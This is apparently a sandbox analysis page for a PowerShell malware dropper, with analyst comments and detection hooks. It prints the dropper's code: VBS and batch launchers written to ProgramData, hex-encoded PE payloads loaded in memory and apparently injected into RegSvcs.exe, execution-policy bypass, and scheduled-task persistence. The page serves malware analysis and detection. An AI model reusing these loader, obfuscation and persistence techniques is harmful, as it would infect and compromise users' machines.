Static | ZeroBOX
No static analysis available.
# Analyst notes (sandbox rendering of a PowerShell dropper). The extraction has lost the
# function's braces and the closing '@ of every here-string, so the text below is not
# runnable as displayed, and where the body of "clay" ends cannot be determined from
# this page. The literals are left exactly as captured; each is described in a comment
# placed above the here-string that holds it.
#
# Visible behaviour of this part: two launcher files are written to C:\ProgramData\
# (run.vbs, then wa.bat), with a 5-second pause after each write.
Function clay
# $p is assigned here but is not referenced again in the visible lines.
$p = 'C:\ProgramData\'
# Launcher 1 (VBScript, saved as run.vbs). The ProgID handed to CreateObject is written
# with "!" between its characters and rebuilt with Replace(), which yields
# "WScript.Shell"; a literal string search for that ProgID would not match the file.
# The object's Run method then starts "C:\ProgramData\wa.bat" with window style 0
# (hidden window). "on error resume next" suppresses any script error.
$Content = @'
on error resume next
Set clay = CreateObject(Replace("W!S!c!r!i!p!t!.!S!h!e!l!l","!",""))
clay.Run chr(34) & "C:\ProgramData\wa.bat" & Chr(34), 0
Set-Content -Path C:\ProgramData\run.vbs -Value $Content
Start-Sleep -s 5
# Launcher 2 (batch, saved as wa.bat): starts PowerShell with -NoProfile and
# -ExecutionPolicy Bypass to run C:\ProgramData\updata.ps1.
# Detection hooks visible so far: .vbs/.bat files created directly in C:\ProgramData\
# by a PowerShell process, and a PowerShell command line that combines
# "-ExecutionPolicy Bypass" with a script path inside that directory.
$Content = @'
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\updata.ps1
Set-Content -Path C:\ProgramData\wa.bat -Value $Content
Start-Sleep -s 5
$Content = @'
$trobs = "4D-_+5A-_+90-_+00-_+03-_+00-_+00-_+00-_+04-_+00-_+00-_+00-_+FF-_+FF-_+00-_+00-_+B8-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+40-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+80-_+00-_+00-_+00-_+0E-_+1F-_+BA-_+0E-_+00-_+B4-_+09-_+CD-_+21-_+B8-_+01-_+4C-_+CD-_+21-_+54-_+68-_+69-_+73-_+20-_+70-_+72-_+6F-_+67-_+72-_+61-_+6D-_+20-_+63-_+61-_+6E-_+6E-_+6F-_+74-_+20-_+62-_+65-_+20-_+72-_+75-_+6E-_+20-_+69-_+6E-_+20-_+44-_+4F-_+53-_+20-_+6D-_+6F-_+64-_+65-_+2E-_+0D-_+0D-_+0A-_+24-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+50-_+45-_+00-_+00-_+4C-_+01-_+03-_+00-_+23-_+90-_+B7-_+5E-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+E0-_+00-_+02-_+01-_+0B-_+01-_+08-_+00-_+00-_+A8-_+00-_+00-_+00-_+0A-_+00-_+00-_+00-_+00-_+00-_+00-_+4E-_+C7-_+00-_+00-_+00-_+20-_+00-_+00-_+00-_+E0-_+00-_+00-_+00-_+00-_+40-_+00-_+00-_+20-_+00-_+00-_+00-_+02-_+00-_+00-_+04-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+04-_+00-_+00-_
$wyzzwy = "4D/=5A/=90/=00/=03/=00/=00/=00/=04/=00/=00/=00/=FF/=FF/=00/=00/=B8/=00/=00/=00/=00/=00/=00/=00/=40/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=80/=00/=00/=00/=0E/=1F/=BA/=0E/=00/=B4/=09/=CD/=21/=B8/=01/=4C/=CD/=21/=54/=68/=69/=73/=20/=70/=72/=6F/=67/=72/=61/=6D/=20/=63/=61/=6E/=6E/=6F/=74/=20/=62/=65/=20/=72/=75/=6E/=20/=69/=6E/=20/=44/=4F/=53/=20/=6D/=6F/=64/=65/=2E/=0D/=0D/=0A/=24/=00/=00/=00/=00/=00/=00/=00/=50/=45/=00/=00/=4C/=01/=03/=00/=28/=F3/=56/=8C/=00/=00/=00/=00/=00/=00/=00/=00/=E0/=00/=0E/=21/=0B/=01/=30/=00/=00/=DC/=02/=00/=00/=06/=00/=00/=00/=00/=00/=00/=2E/=FB/=02/=00/=00/=20/=00/=00/=00/=00/=03/=00/=00/=00/=40/=00/=00/=20/=00/=00/=00/=02/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=06/=00/=00/=00/=00/=00/=00/=00/=00/=40/=03/=00/=00/=02/=00/=00/=00/=00/=00/=00/=03/=00/=60/=85/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=00/=00/=10/=00/=00/=00/=00/=00/=00/=00/=00/=0
Sleep 5
[Byte[]] $bbb = $trobs -split '-_+' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $wyzzwy -split '/=' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
$YIX = [Reflection.Assembly]::Load($pe)
$gss = $YIX.GetType('NewPE.PE' -replace '', '')
$IRW = $gss.GetMethod('Execute')
$KEZ = 'C:\Windows\Micr' -replace '', ''
$ODW = $KEZ + 'osELLLIOOOTTToft.NEELLLIOOOTTTT\FraELLLIOOOTTTmeworELLLIOOOTTTk\v4.0.3ELLLIOOOTTT031ELLLIOOOTTT9\ReELLLIOOOTTTgELLLIOOOTTTSELLLIOOOTTTvELLLIOOOTTTcs.exe' -replace 'ELLLIOOOTTT', ''
$WYZU = @(
$ODW,
$bbb
$IUWS = $IRW.Invoke(
$null,
[object[]] $WYZU
# Analyst notes on the here-string written by the next line (its text is the block of
# lines shown directly above, starting at the $trobs assignment):
#   * $trobs and $wyzzwy are hex byte strings with junk separators ('-_+' and '/=').
#     Both begin 4D 5A, carry the "This program cannot be run in DOS mode" stub and a
#     50 45 00 00 signature, i.e. they are PE images. Both are truncated on this page,
#     so neither payload can be rebuilt or hashed from this listing.
#   * Each string is split on its separator and converted to a byte array; $wyzzwy is
#     loaded in memory with [Reflection.Assembly]::Load, so that image is not written
#     to disk by these lines.
#   * The type 'NewPE.PE' and its method 'Execute' are resolved by reflection. The
#     "-replace '', ''" calls change nothing and only break up the literals.
#   * The path assembled from $KEZ and the 'ELLLIOOOTTT'-padded string resolves to
#     C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe.
#   * Execute is invoked with two arguments: that RegSvcs.exe path and the $trobs bytes.
#     NOTE(review): this looks like running the first PE under a RegSvcs.exe process
#     (injection/hollowing pattern) - not verifiable here; confirm by analysing the
#     decoded NewPE assembly.
# Detection hooks: RegSvcs.exe started by powershell.exe, and PowerShell script-block
# logs containing Reflection.Assembly Load together with long separator-padded hex.
Set-Content -Path C:\ProgramData\updata.ps1 -Value $Content
# Wait 35 seconds, then open run.vbs. Per the file contents on this page the chain is
# run.vbs -> wa.bat -> updata.ps1.
Start-Sleep -s 35
Invoke-Item "C:\ProgramData\run.vbs"
# Persistence stage (saved as inst.ps1): schtasks.exe creates a task named
# 'updatarunom' that runs C:\ProgramData\run.vbs every 5 minutes (/sc minute /mo 5),
# so the whole chain is re-launched on that interval.
# Detection hooks: task name 'updatarunom'; any schtasks /create whose /tr target is a
# script file under C:\ProgramData\.
$Content = @'
&'schtasks.exe' '/create' '/sc' 'minute' '/mo' 5 '/tn' 'updatarunom' '/tr' (('C:\ProgramData\run.vbs'));
Set-Content -Path C:\ProgramData\inst.ps1 -Value $Content
Start-Sleep -s 15
# Runs inst.ps1 in a second PowerShell process using abbreviated parameter names:
# -windo (WindowStyle; 1 corresponds to Hidden), -noexit, -exec bypass
# (ExecutionPolicy). Command-line rules that match only the full parameter names
# will not match this invocation.
powershell -windo 1 -noexit -exec bypass -file "C:\ProgramData\inst.ps1"
# Trailing delays; no further action follows them in the visible lines.
Start-Sleep -s 30
Start-Sleep -S 5
No antivirus signatures available.
No IRMA results available.